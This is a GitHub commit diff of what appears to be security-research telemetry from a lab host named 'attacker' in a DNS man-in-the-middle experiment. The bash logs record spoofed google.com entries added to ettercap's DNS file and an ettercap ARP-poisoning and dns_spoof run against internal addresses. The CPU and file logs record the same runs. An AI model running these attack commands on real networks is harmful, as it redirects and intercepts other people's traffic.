Skip to content

Commit

Permalink
updated data
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Feb 5, 2025
1 parent 77f9da7 commit 74a1831
Show file tree
Hide file tree
Showing 2,755 changed files with 100,941 additions and 134,974 deletions.
14 changes: 7 additions & 7 deletions data/dnsmitm-with-json/0/attacker-data/bash-data.txt
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{"TimeStamp":"1738687157","Host":"attacker","User":"blankcanvas","Count":10,"Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738687129,/home/blankcanvas,sudo /bin/bash -c 'echo www.google.com A 10.1.2.4 >> /etc/ettercap/etter.dns',,[email protected]\r\n","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687157","Host":"attacker","User":"blankcanvas","Count":11,"Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738687130,/home/blankcanvas,sudo ettercap -T -S -i eth1 -M arp:remote -P dns_spoof /10.1.2.3// /10.1.2.2//,%ettercap 0.8.3.1 copyright 2001-2020 Ettercap Development Team\nListening on:\n eth1 -> 92:E3:45:FA:8E:EE\n\t 10.1.2.4/255.255.255.0\n\t fe80::90e3:45ff:fefa:8eee/64\nPrivileges dropped to EUID 65534 EGID 65534...\n 34 plugins\n 42 protocol dissectors\n 57 ports monitored\n28230 mac vendor fingerprint\n1766 tcp OS fingerprint\n2182 known services\nLua: no scripts were specified, not starting up!\nScanning for merged targets (2 hosts)...\n* |==================================================>| 100.00 %%\n2 h\n%,[email protected]\r\n","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687157","Host":"attacker","User":"blankcanvas","Count":12,"Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738687153,/home/blankcanvas,sudo kill $(ps -e | grep ettercap | awk '{print $1}'),,[email protected]\r\n","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687157","Host":"attacker","User":"blankcanvas","Count":6,"Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738687112,/home/blankcanvas,sudo rm -rf /var/log/discern/data/*,,[email protected]\r\n","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687157","Host":"attacker","User":"blankcanvas","Count":7,"Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738687120,/home/blankcanvas,sudo systemctl restart discern-proc,,[email protected]\r\n","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687157","Host":"attacker","User":"blankcanvas","Count":8,"Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738687129,/home/blankcanvas,sudo /bin/bash -c 'echo *.google.com A 10.1.2.4 >> /etc/ettercap/etter.dns',,[email protected]\r\n","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687157","Host":"attacker","User":"blankcanvas","Count":9,"Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738687129,/home/blankcanvas,sudo /bin/bash -c 'echo google.com A 10.1.2.4 >> /etc/ettercap/etter.dns',,[email protected]\r\n","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709964", "Host":"attacker", "User":"blankcanvas", "Count":53, "Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738709919,/home/blankcanvas,sudo rm -rf /var/log/discern/data/*,,[email protected]\r\n", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709964", "Host":"attacker", "User":"blankcanvas", "Count":54, "Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738709927,/home/blankcanvas,sudo systemctl restart discern-proc,,[email protected]\r\n", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709964", "Host":"attacker", "User":"blankcanvas", "Count":55, "Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738709935,/home/blankcanvas,sudo /bin/bash -c 'echo *.google.com A 10.1.2.4 >> /etc/ettercap/etter.dns',,[email protected]\r\n", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709964", "Host":"attacker", "User":"blankcanvas", "Count":56, "Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738709935,/home/blankcanvas,sudo /bin/bash -c 'echo google.com A 10.1.2.4 >> /etc/ettercap/etter.dns',,[email protected]\r\n", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709964", "Host":"attacker", "User":"blankcanvas", "Count":57, "Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738709936,/home/blankcanvas,sudo /bin/bash -c 'echo www.google.com A 10.1.2.4 >> /etc/ettercap/etter.dns',,[email protected]\r\n", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709964", "Host":"attacker", "User":"blankcanvas", "Count":58, "Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738709936,/home/blankcanvas,sudo ettercap -T -S -i eth1 -M arp:remote -P dns_spoof /10.1.2.3// /10.1.2.2//,%ettercap 0.8.3.1 copyright 2001-2020 Ettercap Development Team\nListening on:\n eth1 -> AA:57:72:80:EF:53\n\t 10.1.2.4/255.255.255.0\n\t fe80::a857:72ff:fe80:ef53/64\nPrivileges dropped to EUID 65534 EGID 65534...\n 34 plugins\n 42 protocol dissectors\n 57 ports monitored\n28230 mac vendor fingerprint\n1766 tcp OS fingerprint\n2182 known services\nLua: no scripts were specified, not starting up!\nScanning for merged targets (2 hosts)...\n* |==================================================>| 100.00 %%\nSEN\n%,[email protected]\r\n", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709964", "Host":"attacker", "User":"blankcanvas", "Count":59, "Cmds":"CMBEGIN,attacker.infra.real.dnsmitm.blankcanvas,1738709960,/home/blankcanvas,sudo kill $(ps -e | grep ettercap | awk '{print $1}'),,[email protected]\r\n", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
22 changes: 11 additions & 11 deletions data/dnsmitm-with-json/0/attacker-data/cpu-load-data.txt
Original file line number Diff line number Diff line change
@@ -1,11 +1,11 @@
{"TimeStamp":"1738687114", "Load":[0.9900990099000985], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687120", "Load":[29.591836734695416], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687126", "Load":[0], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687132", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687138", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687144", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687150", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687156", "Load":[0], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687162", "Load":[15.841584158415648], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687168", "Load":[2.000000000001137], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687174", "Load":[0], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709921", "Load":[13.999999999998636], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709927", "Load":[19.999999999998863], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709933", "Load":[13.131313131312552], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709939", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709945", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709951", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709957", "Load":[100], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709963", "Load":[1.1235955056168292], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709969", "Load":[24.24242424242494], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709975", "Load":[12.24489795918391], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709981", "Load":[0], "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
69 changes: 36 additions & 33 deletions data/dnsmitm-with-json/0/attacker-data/file-data.txt
Original file line number Diff line number Diff line change
@@ -1,33 +1,36 @@
{"TimeStamp":"1738687112", "Op":4, "Location":"/tmp/sshcmds.586.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687120", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687120", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687120", "Op":1, "Location":"/tmp/sshcmds.20959.sh", "Permissions":420, "Owner":"blankcanvas", "Group":"blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687120", "Op":2, "Location":"/tmp/sshcmds.20959.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687120", "Op":4, "Location":"/tmp/sshcmds.20959.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":1, "Location":"/tmp/sshcmds.6549.sh", "Permissions":420, "Owner":"blankcanvas", "Group":"blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/sshcmds.6549.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":4, "Location":"/tmp/sshcmds.6549.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":1, "Location":"/tmp/sshcmds.30229.sh", "Permissions":420, "Owner":"blankcanvas", "Group":"blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/sshcmds.30229.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":4, "Location":"/tmp/sshcmds.30229.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":1, "Location":"/tmp/sshcmds.11070.sh", "Permissions":420, "Owner":"blankcanvas", "Group":"blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":2, "Location":"/tmp/sshcmds.11070.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687129", "Op":4, "Location":"/tmp/sshcmds.11070.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687130", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687130", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687130", "Op":1, "Location":"/tmp/sshcmds.7859.sh", "Permissions":420, "Owner":"blankcanvas", "Group":"blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687130", "Op":2, "Location":"/tmp/sshcmds.7859.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687153", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687153", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687153", "Op":1, "Location":"/tmp/sshcmds.32148.sh", "Permissions":420, "Owner":"blankcanvas", "Group":"blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687153", "Op":2, "Location":"/tmp/sshcmds.32148.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687153", "Op":4, "Location":"/tmp/sshcmds.32148.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687157", "Op":4, "Location":"/tmp/sshcmds.7859.sh", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687180", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738687180", "Op":2, "Location":"/tmp/count.blankcanvas", "DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709923","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709923","Op":1,"Location":"/tmp/sshcmds.27307.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709923","Op":2,"Location":"/tmp/sshcmds.27307.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709923","Op":4,"Location":"/tmp/sshcmds.27307.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709927","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709927","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709927","Op":1,"Location":"/tmp/sshcmds.4078.sh","Permissions":420,"Owner":"blankcanvas","Group":"blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709927","Op":2,"Location":"/tmp/sshcmds.4078.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709927","Op":4,"Location":"/tmp/sshcmds.4078.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":1,"Location":"/tmp/sshcmds.1896.sh","Permissions":420,"Owner":"blankcanvas","Group":"blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":2,"Location":"/tmp/sshcmds.1896.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":4,"Location":"/tmp/sshcmds.1896.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":1,"Location":"/tmp/sshcmds.15906.sh","Permissions":420,"Owner":"blankcanvas","Group":"blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":2,"Location":"/tmp/sshcmds.15906.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709935","Op":4,"Location":"/tmp/sshcmds.15906.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":1,"Location":"/tmp/sshcmds.25710.sh","Permissions":420,"Owner":"blankcanvas","Group":"blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":2,"Location":"/tmp/sshcmds.25710.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":4,"Location":"/tmp/sshcmds.25710.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":1,"Location":"/tmp/sshcmds.19057.sh","Permissions":420,"Owner":"blankcanvas","Group":"blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709936","Op":2,"Location":"/tmp/sshcmds.19057.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709960","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709960","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709960","Op":1,"Location":"/tmp/sshcmds.1033.sh","Permissions":420,"Owner":"blankcanvas","Group":"blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709960","Op":2,"Location":"/tmp/sshcmds.1033.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709960","Op":4,"Location":"/tmp/sshcmds.1033.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709963","Op":4,"Location":"/tmp/sshcmds.19057.sh","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709987","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
{"TimeStamp":"1738709987","Op":2,"Location":"/tmp/count.blankcanvas","DevID":"attacker.infra.real.dnsmitm.blankcanvas"}
Loading

0 comments on commit 74a1831

Please sign in to comment.